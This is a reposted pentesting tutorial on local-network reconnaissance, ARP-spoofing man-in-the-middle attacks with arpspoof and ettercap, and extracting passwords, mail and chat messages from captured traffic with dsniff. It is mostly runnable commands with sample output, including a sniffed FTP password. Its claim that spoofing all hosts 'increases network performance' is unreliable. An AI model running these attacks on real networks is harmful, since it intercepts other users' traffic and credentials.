Pentesting In Local Networks [Unix]

---------------------------------------
| Team ph0x90bic proudly presents     |
| Pentesting in Local Networks Part 1 |
| Reconaissance and ARP Poisoning     |
---------------------------------------

INTRODUCTION

This paper describes standard Reconaissance, ARP-Poisoning and traffic
analysis technics with dsniff, ettercap and netdiscover on local networks.
You find all needed tools preinstalled on nodezero linux.

Tools needed:

* netdiscover		(Search for hosts on local network)
* tcpdump/tshark	(Sniff network traffic)
* dsniff/ettercap	(Launch ARP-Poisoning and analyze pcap files)

---

CHECK LOCAL NETWORK CONFIGURATION

First check your local network configuration to gain information about
the local network you are connected.

# sudo ifconfig

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:18308 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18308 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:9599453 (9.5 MB)  TX bytes:9599453 (9.5 MB)

wlan0     Link encap:Ethernet  HWaddr 90:4c:e5:a5:9c:2b  
          inet addr:10.0.0.1  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80::924c:e5ff:fea5:9c2b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:32320 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30280 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:21141126 (21.1 MB)  TX bytes:16626291 (16.6 MB)

# sudo route -n

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.0.0.0        0.0.0.0         255.255.255.0   U     2      0        0 wlan0
169.254.0.0     0.0.0.0         255.255.0.0     U     1000   0        0 wlan0
0.0.0.0         10.0.0.254      0.0.0.0         UG    0      0        0 wlan0

RESULTS

Ownipv4:	10.0.0.1
Ownipv6:	fe80::924c:e5ff:fea5:9c2b/64
Gateway:	10.0.0.254
Netmask:	255.255.255.0
Network:	10.0.0.0/24
Interface:	wlan0

---

COLLECT PASSIVE INFORMATION

You can collect information without sending network traffic by sniffing
the network traffic with tshark or tcpdump. Netdiscover lists you the
alive hosts in realtime and shows you the MAC Vendor.

# sudo tshark -n -i wlan0 -w netlog.pcap not src 10.0.0.1 &
# sudo tshark -n -i wlan0 not src 10.0.0.1

# sudo tcpdump -n -i wlan0 -w netlog.pcap not src 10.0.0.1 &
# sudo tcpdump -n -i wlan0 not src 10.0.0.1

# sudo netdiscover -p -i wlan0

--- SNIPPED TCPDUMP OUTPUT START ---
...
16:43:46.886878 ARP, Request who-has 10.0.0.254 tell 10.0.0.254, length 28
16:43:46.888905 ARP, Request who-has 10.0.0.2 tell 10.0.0.254, length 28
16:43:46.889431 ARP, Request who-has 10.0.0.3 tell 10.0.0.254, length 28
16:43:46.891183 ARP, Request who-has 10.0.0.4 tell 10.0.0.254, length 28
...
--- SNIPPED TCPDUMP OUTPUT END ---

--- NETDISCOVER OUTPUT START ---
 Currently scanning: (passive)   |   Screen View: Unique Hosts                                                                                                         
                                                                                                                                                                       
 174 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 7344                                                                                                    
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 10.0.0.254      00:1f:9f:e9:1e:a6    157  6594   Thomson Telecom Belgium                                                                                            
 10.0.0.3        00:24:21:ba:04:bd    02    120   Unknown vendor                                                                                                       
 10.0.0.2        00:18:de:60:9f:7d    02    084   Intel Corporation                                                                                                    
 0.0.0.0         00:18:de:60:9f:7d    03    126   Intel Corporation                                                                                          
 10.0.0.4        00:90:4b:94:2d:0d    10    420   GemTek Technology Co., Ltd.  
--- NETDISCOVER OUTPUT END ---

RESULTS

Hosts:		10.0.0.2 (00:18:de:60:9f:7d)
		10.0.0.3 (00:24:21:ba:04:bd)
		10.0.0.4 (00:90:4b:94:2d:0d)

---

ARPSPOOFING ALL HOSTS

You can arpspoof all hosts on the local network. This is dangerous in large
networks, because it increases network performance. But in small networks
spoofing all hosts is possible without any problems.

# sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1

# sudo arpspoof -i wlan0 10.0.0.254
# sudo ettercap -TQM arp:remote -i wlan0 // /10.0.0.254/

RESULTS

Sniffed traffic from all hosts on network as pcap file in landump.pcap

---

ARPSPOOF SPECIFIC HOST

On larger networks use this attack to arpspoof a specific host only.

# sudo tcpdump -n -i wlan0 -w landump.pcap not host 10.0.0.1
# sudo tshark -n -i wlan0 -w landump.pcap not host 10.0.0.1

# sudo arpspoof -i wlan0 -t 10.0.0.2 10.0.0.254
# sudo ettercap -TQM arp:remote -i wlan0 /10.0.0.2/ /10.0.0.254/

RESULTS

Sniffed traffic from 10.0.0.2 only as pcap file in landump.pcap

---

DSNIFF

You can analyze pcap files easily with the dsniff tools or manually with
string, grep or similar tools.

# sudo dsniff -n -p landump.pcap			(Passwords)
# sudo urlsnarf -n -p landump.pcap			(HTTP Requests)
# sudo filesnarf -n -p landump.pcap			(NFS Files)
# sudo mailsnarf -n -p landump.pcap			(SMTP/POP mails)
# sudo msgsnarf -n -p landump.pcap			(Chat messages)
# sudo strings landump.pcap | grep -i 'yourstring'	(Manual analysis)

--- DSNIFF OUTPUT START ---
03/18/11 20:48:12 tcp 10.0.0.2.50222 -> openbsd.sunsite.ualberta.ca.21 (ftp)
USER anonymous
PASS SUPERGEHEIM
--- DSNIFF OUTPUT END ---

RESULTS

Cleartext information in sniffed pcap traffic.

---

你可能感兴趣的:(unix,职场,休闲,Networks,pentesting)